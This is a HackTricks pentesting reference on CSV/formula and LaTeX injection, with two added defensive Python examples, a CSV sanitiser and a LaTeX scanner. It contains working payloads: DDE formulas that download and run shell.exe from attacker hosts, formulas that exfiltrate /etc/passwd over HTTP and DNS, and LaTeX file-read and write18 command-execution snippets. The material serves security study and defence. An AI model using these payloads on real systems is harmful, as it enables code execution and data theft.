hacktricks/pentesting-web/formula-doc-latex-injection.md
2022-11-13 10:12:25 +00:00


# Formula/CSV/Doc/LaTeX Injection
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
## Formula Injection
### Info
If your **input** is being **reflected** inside **CSV files** (or any other file that is probably going to be opened by **Excel**), you may be able to insert Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the Excel sheet.
{% hint style="danger" %}
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent them from taking a malicious action. Therefore, special effort on social engineering must be applied to the final payload.
{% endhint %}
### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
### Hyperlink
**The following example is very useful to exfiltrate content from the final Excel sheet and to perform requests to arbitrary locations. But it requires the user to click on the link (and accept the warning prompts).**
Example taken from [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
Let us assume an attack scenario involving the Student Record Management system of a school. The application allows teachers to enter details of students in the school. The attacker gets access to the application and wants all the teachers using the application to get compromised. So the attacker tries to perform a CSV injection attack through the web application.\
The attacker needs to steal other students' details. So the attacker uses the Hyperlink formula and enters it while entering student details.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_008.png)
When the teacher exports the CSV and clicks on the hyperlink, the sensitive data is sent to the attacker's server.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_009.png)
The exported CSV file contains the malicious payload.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_010.png)
The details of the student are logged in the attacker's web server.
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_011.png)
### RCE
For this example to work, the **following configuration must be enabled**:\
File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch\
or the use of an **old Excel version**.
The good news is that **this payload is executed automatically when the file is opened** (if the user accepts the warnings).
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1) (1) (2).png>)
### More
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
### LFI
**LibreOffice Calc**
* This will read the 1st line from the local /etc/passwd file: `='file:///etc/passwd'#$passwd.A1`
* Ex-filtrate it: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Ex-filtrate more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS Exfiltration: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`
**Analyzing the DNS ex-filtration payload:**
* `file:///etc/passwd#$passwd.A19`: reads the 19th line from the local /etc/passwd file
* `ENCODEURL(file:///etc/passwd#$passwd.A19)`: URL-encodes the returned data
* `MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41)`: similar to substring, reads data from the 1st character to the 41st; a very handy way to restrict the length of DNS hostnames (254 character limit on FQDN and 63 characters for a label, i.e. subdomain)
* `SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),"%","-")`: replaces all instances of % (the special character from URL encoding) with a dash; this ensures that only valid DNS characters are used
* `CONCATENATE((SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),"%","-")),".<FQDN>")`: concatenates the output from the file (after the above processing has taken place) with the FQDN (for which we have access to the host that is authoritative for the domain)
* `WEBSERVICE`: makes a request for this non-existent DNS name, which can then be seen by parsing the logs (or running tcpdump etc.) on the authoritative DNS name server that we control
### Google Sheets OOB Data Exfiltration
Firstly, let's introduce some of the more interesting functions.
**CONCATENATE**: Appends strings to one another.
```
=CONCATENATE(A2:E2)
```
**IMPORTXML**: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.
```
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
```
**IMPORTFEED**: Imports a RSS or ATOM feed.
```
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
```
**IMPORTHTML**: Imports data from a table or list within an HTML page.
```
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
```
**IMPORTRANGE**: Imports a range of cells from a specified spreadsheet.
```
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```
**IMAGE**: Inserts an image into a cell.
```
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```
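On the export side, the payloads and exfiltration formulas above all rely on a cell that starts with a character the spreadsheet evaluates. The following is an added example (not from the original page or the sources it cites) that neutralizes such cells when writing a CSV and audits an existing export; the function names and sample rows are constructed for illustration.

```python
import csv
import io
import re

# Leading characters that make Excel / LibreOffice Calc / Google Sheets
# evaluate a cell (formula, DDE call) instead of displaying it.
TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")
PLAIN_NUMBER = re.compile(r"[+-]?\d+(\.\d+)?")

def is_formula_like(text):
    """True if a spreadsheet could evaluate this cell rather than show it."""
    if PLAIN_NUMBER.fullmatch(text):
        return False  # keep values such as -12.5 usable as numbers
    return text.lstrip(" ").startswith(TRIGGERS)

def neutralize_cell(value):
    """Prefix risky cells with an apostrophe so they are treated as text."""
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text

def export_csv(rows):
    """Write rows with every field quoted and every cell neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()

def find_formula_cells(csv_text):
    """Audit an existing export: (row, column, value) of each risky cell."""
    reader = csv.reader(io.StringIO(csv_text))
    return [(r, c, cell) for r, row in enumerate(reader, 1)
            for c, cell in enumerate(row, 1) if is_formula_like(cell)]

# Constructed sample records; the formula strings are taken from this page.
SAMPLE_ROWS = [
    ["name", "grade", "note"],
    ["Alice", "-12.5", "ok"],
    ["Bob", "7", "=cmd|' /C notepad'!'A1'"],
    ["Carol", "9", "@SUM(1+9)*cmd|' /C calc'!A0"],
    ["Dave", "8", "='file:///etc/passwd'#$passwd.A1"],
    ["Eve", "6", '  =IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")'],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
```

The apostrophe prefix stays in the data, so programmatic consumers of the CSV must expect it; purely numeric values such as `-12.5` are left untouched.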
## LaTeX Injection
Usually, the servers you will find on the internet that **convert LaTeX code to PDF** use **`pdflatex`**.\
This program uses 3 main options to (dis)allow command execution:
* **`--no-shell-escape`**: **Disable** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
* **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** commands (on Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.
However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.
### Read file <a href="#read-file" id="read-file"></a>
```latex
\input{/etc/passwd}
\include{password} % load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
#### Read single lined file
```latex
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
#### Read multiple lined file
```latex
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
### Write file <a href="#write-file" id="write-file"></a>
```latex
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```
### Command execution <a href="#command-execution" id="command-execution"></a>
The input of the command will be redirected to stdin; use a temp file to get it.
```latex
\immediate\write18{env > output}
\input{output}
\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
% allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}
% If mpost is not allowed there are other commands you might be able to execute
%% Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
%% Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
%% Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
%% Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```
If you get any LaTeX error, consider using base64 to get the result without bad characters:
```latex
\immediate\write18{env | base64 > test.tex}
\input{test.tex}
```
```latex
\input|ls|base64
\input{|"/bin/hostname"}
```
### Cross Site Scripting <a href="#cross-site-scripting" id="cross-site-scripting"></a>
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```latex
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
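For triage on the server side, an added example (not from the original page): it scans an untrusted LaTeX submission for the primitives listed in the sections above and builds a `pdflatex` invocation with shell escape disabled. Function names and the sample document are constructed; `openin_any`/`openout_any` are kpathsea settings from `texmf.cnf` passed here as environment overrides, and the `obfuscation` rule is an assumption beyond the page.

```python
import re

# Primitives shown in the sections above, grouped by the capability they give.
RULES = {
    "command-exec": r"\\write18\b|\\(?:input|include)\s*\{?\s*\|",
    "file-read": r"\\(?:input|include|lstinputlisting|verbatiminput"
                 r"|openin|newread)\b",
    "file-write": r"\\(?:openout|newwrite)\b",
    "script-url": r"\\(?:url|href)\s*\{\s*(?i:javascript:)",
    # Assumption (not on the page): \catcode and \csname can rebuild any of
    # the names above, so a name-based scan has to flag them too.
    "obfuscation": r"\\(?:catcode|csname)\b",
}
RULES = {name: re.compile(rx) for name, rx in RULES.items()}
COMMENT = re.compile(r"(?<!\\)%.*")  # drop comments, keep a literal \%

def scan_latex(source):
    """Return (line number, category, matched text) for risky constructs."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        code = COMMENT.sub("", line)
        for category, pattern in RULES.items():
            match = pattern.search(code)
            if match:
                findings.append((lineno, category, match.group(0)))
    return findings

def hardened_invocation(tex_file, out_dir):
    """argv with shell escape (write18, piped input) disabled, plus
    environment overrides the caller merges into the compiler's env."""
    argv = ["pdflatex", "-no-shell-escape", "-interaction=nonstopmode",
            "-halt-on-error", f"-output-directory={out_dir}", tex_file]
    return argv, {"openin_any": "p", "openout_any": "p"}

# Constructed submission mixing harmless lines with constructs from the page.
SAMPLE = r"""\usepackage[utf8]{inputenc}
Discount: 20\% % \input{/etc/passwd} in a comment is inert
\includegraphics{logo}
\input{|"/bin/hostname"}
\immediate\write18{env > output}
\href{JavaScript:alert(1)}{placeholder}
"""

if __name__ == "__main__":
    for finding in scan_latex(SAMPLE):
        print(finding)
```

Name matching is a detection aid rather than a sandbox, so run the compiler with the returned arguments and environment regardless of the scan result.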